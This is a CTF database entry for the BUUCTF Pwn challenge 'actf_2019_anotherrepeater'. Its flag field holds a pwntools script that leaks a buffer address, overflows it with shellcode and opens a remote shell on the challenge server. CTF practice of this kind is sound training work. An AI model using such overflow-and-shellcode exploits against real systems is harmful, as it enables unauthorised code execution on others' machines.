| ID: | 8049 |
|---|---|
| 标题: | actf_2019_anotherrepeater |
| 描述: | Ubuntu 18 https://github.com/hebtuerror404 |
| 类型: | Pwn |
| 网站: | BUUCTF |
| 题目链接: | https://buuoj.cn/challenges#actf_2019_anotherrepeater |
| 赛事: | None |
| 年度: | None |
| Flag值: | from pwn import * context(log_level='debug') io=remote("node3.buuoj.cn",28438) io.recv() io.sendline(str(-10)) buf=int(io.recv(8),16) payload=asm(shellcraft.sh()).ljust(0x41b+0x4,b'A')+p32(buf) io.sendline(payload) io.interactive() |
| writeup: | https://blog.csdn.net/stareforever/article/details/112793933 |